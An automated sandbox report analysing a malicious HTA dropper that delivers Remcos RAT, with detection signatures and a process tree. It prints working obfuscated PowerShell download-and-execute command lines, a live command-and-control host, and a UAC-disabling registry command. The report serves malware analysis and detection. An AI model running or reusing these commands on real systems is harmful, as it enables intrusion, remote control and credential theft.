
Windows Analysis Report
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta

Overview

General Information

Sample name: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Analysis ID: 1576455
MD5: 80636733be5c6936770df78c2298d639
SHA1: 0e9cd08975bff8b04e8e7671f13c2585c25796a5
SHA256: 9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
Tags: hta, user-lontze7

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 3608 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 3200 cmdline: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1776 cmdline: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 5924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 1776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | Rule: JoeSecurity_Obshtml | Description: Yara detected obfuscated html page | Author: Joe Security
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x10c008:$a1: Remcos restarted by watchdog!
  • 0x10c580:$a3: %02i:%02i:%02i:%03i
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 12.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 12.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 12.2.CasPol.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 12.2.CasPol.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source: 12.2.CasPol.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source: amsi32_5924.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_5924.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdH
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEl
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0Z
pbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", ProcessId: 5748, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1776, TargetFilename: C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9p
